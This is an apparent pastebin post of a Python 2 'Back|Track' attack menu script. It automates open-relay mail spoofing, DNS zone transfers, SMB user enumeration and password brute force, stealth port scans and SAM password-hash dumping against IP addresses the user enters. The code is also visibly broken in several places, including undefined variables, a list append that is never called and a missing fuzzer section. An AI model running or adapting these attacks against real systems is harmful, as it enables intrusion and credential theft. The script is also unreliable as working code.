Advertising
Paste Description for ReL1K's Suite
entire exploit suite for backtrack
- ReL1K's Suite
- Monday, April 23rd, 2007 at 9:28:01am MDT
- #! /usr/bin/python
- # Back|Track V2.0 Attack Module
- # Created by: ReL1K
- #
- # Remember to chmod 755 btupdate.py
- #
- import os
- import smtplib
- import time
- import dns.zone
- import dns.query
- import dns.resolver
- import sys
- from dns.rdatatype import *
- from dns.rdataclass import *
- from dns.exception import DNSException
- print """
- Back|Track v2.0 Final Toolset
- Written by: ReL1K
- """
- # Main Menu to choose
- while 1==1 :
- mainmenu=raw_input("""Back|Track Main Menu:
- 1. Back|Track Updates
- 2. External Attack and Penetration
- 3. Internal Attack and Penetration
- 4. Wireless Assessment
- 5. Fuzzers
- 6. Exit
- Enter the number: """)
- # End Main Menu
- # End loop with option 5
- if mainmenu == ('6'):
- print """
- **** QUITTING ****
- """
- break
- # End loop
- # Start BackTrack Updates
- if mainmenu == ('1'):
- while 1==1 :
- blah=raw_input("""Enter a number to update
- 1. Metasploit 2
- 2. Metasploit 3
- 3. Aircrack-NG
- 4. Kismet
- 5. Milw0rm
- 6. Install Aircrack-PTW
- 7. Return to Main Menu
- Enter number: """)
- if blah == '1':
- print """
- **** Updating Metasploit v2 ****
- """
- a=os.system("svn update /pentest/exploits/framework2/")
- print a
- if blah == '2':
- print """
- **** Updating Metasploit v3 ****
- """
- b=os.system("svn update /pentest/exploits/framework3/")
- print b
- if blah == '3':
- print """
- **** Updating AirCrack-NG ****
- """
- c=os.system("svn co http://trac.aircrack-ng.org/svn/trunk/ /pentest/wireless/aircrack-ng;cd /pentest/wireless/aircrack-ng;make clean && make && make install")
- print c
- if blah == '4':
- print """
- **** Updating Kismet ****
- """
- d=os.system("svn co http://svn.kismetwireless.net/code/trunk /pentest/wireless/kismet;cd /pentest/wireless/kismet;./configure && make clean && make && make install")
- print d
- if blah == '5':
- print """
- **** Updating Milw0rm ****
- """
- e=os.system("cd /pentest/exploits;wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2;tar jxpf milw0rm.tar.bz2;rm milw0rm.tar.bz2;cd milw0rm;./makeindex-milw0rm &&")
- print e
- if blah == '6':
- print """
- **** Adding AirCrack-PTW to Back|Track ****
- """
- f=os.system("cd /pentest/wireless;wget http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz;tar -zxvf aircrack-ptw-1.0.0.tar.gz;cd aircrack-ptw-1.0.0;gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 -lpcap aircrack-ptw.c aircrack-ptw-lib.c -lpcap ;cp aircrack-ptw /usr/local/bin;rm /pentest/wireless/aircrack-ptw-1.0.0.tar.gz;chmod 755 /usr/local/bin/aircrack-ptw")
- print f
- if blah == '7':
- print """
- **** Exiting Menu ****
- """
- break
- # End Back|Track Updates
- # Start External Attack and Penetration
- if mainmenu == '2':
- while 1==1:
- menu = raw_input("""Lets do this:
- 1. Enumeration
- 2. Port Scanning
- 3. Mail Relay
- 4. Zone Transfer
- 5. Exploitation
- 6. SQL Injection spawn XP_Cmdshell
- 7. Return to Previous Menu
- Enter a number: """)
- if menu == '3' :
- # Mail Relay Written by ReL1K
- ab1 = raw_input ("Enter From: ")
- ab2 = raw_input ("Enter To: ")
- ab5 = time.ctime(time.time())
- ab3 = raw_input ("Enter Subject: ")
- ab4 = raw_input ("Enter Message: ")
- ab6 = ('From: %s\nTo: %s\nDate: %s\nSubject: %s\n%s\n' % (ab1,ab2,ab5,ab3,ab4))
- server= raw_input("Enter servername: ")
- print "Sending the mail now..."
- mailsend= smtplib.SMTP('%s' % (server))
- code = mailsend.sendmail(ab1, ab2, ab6)
- s.quit()
- if code:
- print "Didn't send successfully"
- else:
- print "It worked!"
- # End Mail Relay
- # Starting Zone Transfer
- # By ReL1K
- if menu == '4':
- domain = raw_input ("Enter domain name: ")
- print ("Looking up NS for domain %s" % (domain))
- resolve = dns.resolver.query(domain, 'NS')
- ns= []
- for rdata in resolve:
- n = str(rdata)
- print "Name server found:", n
- ns.append
- for n in ns:
- print "Attempting a zone transfer..."
- try:
- zonetransfer = dns.zone.from_xfr(dns.query.xfr(n, domain))
- print "\nPrinting results..."
- for name, node in zone.nodes.items():
- rdataset = node.rdatasets
- for record in rdataset:
- print >> logfile, 'name, record'
- except DNSException, e:
- print e.___class___, e
- #End Zone Transfer
- # start option 7 menu
- if menu == '7' :
- print """
- ***** Returning to Previous Menu *****
- """
- break
- # End option 7 exit
- # Start Internal Attack and Penetration Option 3
- if mainmenu == '3' :
- while 1==1:
- intmenu=raw_input("""What doya wanta do:
- 1. Null Session User Dump and Brute Force (lowercase, upper, and blank)
- 2. Blank SQL Ping and Auto Spawn XP_Cmdshell
- 3. Port Scanning
- 4. Dump SAM
- 5. Prep your box for this menu
- 6. Go Back a previous menu
- Enter a number: """)
- # Start Option 1 SMB Brute Force
- if intmenu == '1':
- input1=raw_input("Enter the IP address: ")
- smb=os.system("/pentest/enumeration/smb-enum/smbdumpusers -i %s -v -r /root/internalap/%sdumpusers.txt" % (input1,input1))
- print smb
- smbbf=os.system("/pentest/enumeration/smb-enum/smbbf -i %s -p /root/internalap/smbpasslist.txt -u /root/internalap/%sdumpusers.txt -r /root/internalap/%ssmbsuccess.txt -v" % (input1,input1,input1))
- print smbbf
- print """
- When completed, your results will be in /root/internalap/smbsuccess.txt
- """
- # Option 1 SMB Brute Force END
- # Option 3 Port Scanning
- if intmenu == '3':
- portmenu=raw_input("""What type of scan:
- 1. Stealth SYN
- 2. Stealth TCP
- Choose a number: """)
- # Chose 1 Syn Scan
- if portmenu == '1':
- synip=raw_input("Enter the IP: ")
- syn=os.system("nmap -sS -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip))
- print syn
- print "*** Results will be printed in /pentest/internalap under <ip>portscan.txt ***"
- # Chose 2 TCP Scan
- if portmenu == '2':
- tcpip=raw_input("Enter the IP: ")
- tcp=os.system("nmap -sT -O -v -P0 %s > /root/internalap/%sportscan.txt" % (synip,synip))
- print tcp
- print "*** Results will be printed in /root/internalap under <ip>portscan.txt ***"
- # End Port Scan
- # Start SAM SUMP
- if intmenu == '4':
- ipdump=raw_input("Enter the IP of server: ")
- ipuser=raw_input("Enter the Username (example domain\user): ")
- sam=os.system("/pentest/windows-binaries/passwd-attack/wine PWDump4.exe %s /u: %s /o: /root/internalap/%ssamdump.txt" % (ipdump,ipuser,ipdump))
- print sam
- # End SAM DUMP
- # Option 5 Start PREP
- if intmenu == '5':
- print """
- ****** Prepping your Box ******
- """
- c=os.system("rm -rf /root/internalap")
- a=os.system("mkdir /root/internalap")
- b=os.system('echo -e "\nlc %username%\nuc %username%" > /root/internalap/smbpasslist.txt')
- print c
- print a
- print b
- print """
- ****** Your results will be piped to /root/internalap ******
- """
- # Option 5 Prep END
- # Option 6 Previous Menu
- if intmenu == '6':
- print """
- ****** Returning to previous menu ******
- """
- break
- # End Option 6 Previous Menu
- # Starting Main Menu 6 Fuzzers
advertising
Update the Post
Either update this post and resubmit it with changes, or make a new post.
You may also comment on this post.
Please note that information posted here will expire by default in one month. If you do not want it to expire, please set the expiry time above. If it is set to expire, web search engines will not be allowed to index it prior to it expiring. Items that are not marked to expire will be indexable by search engines. Be careful with your passwords. All illegal activities will be reported and any information will be handed over to the authorities, so be good.